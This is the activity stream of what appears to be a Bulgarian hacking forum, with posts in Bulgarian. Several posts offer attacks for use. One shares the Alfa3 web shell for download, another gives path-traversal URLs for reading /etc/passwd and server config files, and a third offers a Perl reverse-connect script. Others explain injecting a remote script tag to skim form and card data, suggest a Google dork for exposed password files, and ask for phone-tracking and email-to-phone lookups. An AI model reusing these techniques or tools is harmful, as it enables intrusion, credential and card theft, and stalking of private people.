Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

All Activity

This stream auto-updates     

  1. Yesterday
  2. Last week
  3. Здравейте, Извинете ме за закъснелия отговор. Доколкото разбирам визирате как се извършва изтриването на файлове и до колко това е важно за процеса на шифроване като цяло. Тук имате няколко различни функции, които работят по много различен начин. ИЗТРИВАНЕ: - Преместване на информацията за файла в кошчето (Recycle Bin) - Стандартна процедура, при която файлът може да се възстанови. - Изтриване на файла - Малко по-добър вариант. При него имаме "зачистване" на секторите (записваме 0), но ... това може да породи съмнения. - Манипулативен подход - На мястото на файла се записва друг. В случая става дума за физическо ниво. Това е типичен подход от използването на IOUtils. - Black Screen изтриване - Достъпно е само в Enterprice версиите, но там се изисква разрешение за придобиване. Изтриването на файловете е много важно за процеса на шифроване. То е толкова значимо, колкото и генерирането и унищожаването на динамичните , секретни ключове. ШИФРОВАНЕ: - Записване на файла на ново място - Стандартен подход, който не е никак надежден. - Записване на файла върху самия себе си - По-добро решение, но ... методът е по-бавен и не се препоръчва за големи масиви от файлове. - Записване на ново място с последващо изтриване на изходните файлове - Има го като функционалност във всички версии, но изтриването е различно. - Използване на защитени "куфарчета" (Protected Data Case) - Това е много мощно решение, но изисква допълнителен хардуер. За сега е най-търсено като решение. - Използване на "супер сейфове" (Super Safe) - Много мощна технология. Достъпна е от версия РЕ (Profesional Edition). Мисля, че не се продава на частни лица. Ето как изглеждат "куфарчетата" (protected data case) в някои от по-ниските версии. Забавно е как те обработват файловете и на това определено ще отделим време. Външно имат сходство със сейфовете, но то е само външно (в интерфейса). Различията са в генерацията на секретния ключ (ключове, ако се шифрова по BS-6192), синхронизацията, съхранението на файлове и пр.. А въпросът е много правилен. Както се знае дори след форматиране на диска информацията може да бъде възстановена. По принцип имаме договорка с Intel за използване на едни малки, но много ефективни устройства (цена под 200 лв.). Използват се за качествени телевизори, но ние им намерихме още едно приложение. Идеята е да имаме много бързи, много защитени и със защита IP64 устройства, които да ползваме. Пак повтарям, че въпросът е изключително важен и правилен и определено ще публикувам малко информация какво как се прави. Мисля, че след това ще може да дискутираме предимствата и недостатъците на различните подходи. Още веднъж ви благодаря.
  4. Earlier
  5. Здравейте, Как мога да разбера, кои части ще са съвместими с тази стара машина. Процесора е двуядрен на 3,4 и все още се държи. Ползва се само за офис пакета и от време на време за музика Търся рам и нова видео карта , за да не засичат клипчетата от youtube
  6. Споделям, един от най-добрите шелове от колекцията ми - Alfa3 на ALFA TEAM ☣ (Iranian Hackers). Шелът съдържа всички необходими инструменти за един хакер. Интерфейсът е чудесен, елементарен за разбиране и лесен за навигиране. Смъкни
  7. Ще го видя благодаря
  8. Здравейте хора! Може ли някой да изкочи с идея за приложение за следене на мобилен телефон без значение дали iOS или Android? Прочетох една тема в която се споменава Phone tail но не откривам приложението никъде. Благодаря за вниманието!
  9. Реших да пусна темата за eдна популярна уязвимост LFD (Local File Disclosure) или AFD (Arbitrary File Download). Методът се exploit-ва лесно. Аз предпочитам да гледам за улеснение направо през source кода, под формата на: view-source:http://site.com/?view=/../../../../../../../etc/passwd или view-source:http://site.com/download.php?file=/../../config.php По този начин могат да се разчетат критични данни и пароли на сървъра. За какво и как може да се възползва от това, зависи от намеренията и фантазията на хакера. Ужасно много сайтове страдат от тази слабост, включително и важни такива.
  10. Kогато имаме нужда от обратна връзка с отдалечения сървър и по никакав начин не успяваме, този script написан на Perl помога почти във всички случаи. Как се използва: command > perl IP Port Примерно: perl 127.0.0.1 1212 За целта трябва да имате отворен съответен порт. Смъкни!
  11. Вече предлагаме и API , всеки който иска да си стартира собствен бизнес вече може да го направи.
  12. Здравейте , виждам , че сте доста на ''ти'' с програмирането и като цяло кибер сигурността .. а въпросът ми разбира се ,ако мога да го задам е .. От къде да започна .. някакви насоки от човек в час със системите ще ми е доста от ползва и като реализация и доходи дали е задоволяващо макар да не ми е от голямо значение дохода .. а просто искам да започна в тази сфера на технологиите.Развиват се с доста бързи темпове и съм насочен към Етическо хакерство и кибер сигурност не знам до колко вървят ръка за ръка или въобще вървят :Д .. та въпроса ми е от къде трябва да започна и как да процедирам за напред? П.С : Извинете ме , ако не е в правилния раздел
  13. Здравейте, имам нужда от помощ, някой може ли да открие телефонния номер, на който е регистрирана дадена електронна поща. Всмисъл нали знаете, че когато искате да възтановите забравена парола на имейл ви предлага да прати код на телефонен номер, е, някой може ли да ми намери този номер?
  14. Хакерството си е хакерство. Няма значение дали е "етично" или "неетично", разлика няма. Youtube, разните security/hacking форуми, exploit сайтове са пълни с информация и уроци. Започни с нещо много елементарно! Търси в Google следното: filetype:txt intext:username password filetype ще рече - разширение на файла. intext e съдържанието Ще видиш колко много резултати ще излязат. Ти разбира се можеш да промениш търсенето. Успех!
  15. 1. Download Kali Linux 2. "Kali linux hacking tutorials in youtube" 3. И нека хакера в теб да се събуди!
  16. Здравейте , от няколко дена търся за някакви уроци за начинаещи в "етичното хакерство" , но уви , без успех . Възможно е да не съм търсил много изчерпателно , също не знам дали тази тема е в правилния раздел , извинявам се , ако не е . Можете ли , ако имате уроци , клипове или дори и каквито и да било ресурси за начинаещи , за да мога да почна от някъде да се захвана за нещо . Благодаря ви за отделеното време !!!
  17. OSEE на offsec може да се в вземе само в шатите. По време на BlackHat. В европа може да се запишеш за обучение от Corelan https://www.corelan.be/ . Това е най-близкото до този сертификат.
  18. Някакви насоки към сайтове с полезна информация за HTML , ако имаш някакви ресурси запазени които си използвал , ако ли не ще поразровя . Също така четох , че е най добре на Kali Linux да си пробвам и тествам нещицата :), и естествено благодаря за бързият отговор .. Форума днеска от работа още го разглеждам прочетох доста и продължавам да чета :Д допадна ми като цяло.
  19. Всичко е напълно възможно стига да имаш желание! Аз лично ти препоръчвам ако искаш да започнеш първо с най-простото HTML, да имаш някаква основа, и като цяло да, книгата би ти дала някакви насоки и познания в тази област! Препоръчвам ти да разгледаш ЦЕЛИЯТ форум, тук има много ама МНОГО интересни теми за абсоютно всичко като цяло... Аз лично съм много благодарен на създателя на този форум, от тук съм научил много!
  20. Здравейте , не бих ви посочил като колеги , поне не все още , та така мисълта ми е ,ако нямам никакви познанства от към хакерството и програмирането като цяло мога ли да започна от книгата на Александър Цокев и езикът Python като цяло от интернет за сега да го уча .. възможно ли е да прогресирам по този начин до някаква степен
  21. Здравейте, от известно време търся хак за онлайн играта Тривиадор. Бих искал да знам някой запознат ли е с темата и моля да съдействате с каквато и да е информация. Лично съм виждал хакери, дори имам един в приятели(пускам screenshot за доказателство). Ако се намери съм готов да почерпя.
  22. Здравейте колеги схемата е следната: слизате в този https://discordapp.com/invite/5JD24at дискорд сървър като направите определен брой поканени хора получавате акаунт със скинове. Успех!
  23. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  24. Здравей, Напълно те подкрепям. Трябва да се знае английски, защото за езиците от високо ниво това е огромно предимство. Не знам дали сте запознати, но в Малайзия (и не само там) използването на английски език в много сфери е забранено със закон от 1985 година. Бяха ми нужни три години за да разбера защо това е направено. Повярвайте има желязна логика. Преди години имах сериозен проблем при работата си с японци. Те не признават никаква техническа документация на английски език. Само на японски и само на катакана. Никакъв компромис. С датчаните е още по-страшно. Там изискват да знаете писмено и говоримо датски. Английският език в Дания не се използва в работни взаимоотношения. Пиша това въз основа на горчив, личен опит. Ако искаме развитие в технологичната сфера е нужно да имаме солидна база. Не може да изучаваме програмиране, а да не знаем какво е алгоритъм. Друга много сериозна грешка е, че битува схващането, че трябва да си добър математик за да си добър програмист. Да, но числените методи в програмирането са доста далеч от фундаменталната математика. Да не споменавам, че съществува огромен набор от математически прийоми, създадени от програмисти, за които математиците не са и чували. Мисля, че най-напред би следвало да се научим да общуваме. Това е много трудно. Още по-трудно е да се научим да водим дебат (дискусия). Най-трудно от всичко е да обменяме знания. Признавам, че и до момента ми е трудно да се справя с това. Това, което ми харесва в този форум е, че има дискусия. За разлика от много други тук се спазва добрият тон, а това е едно много хубаво начало.
  1. Load more activity
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.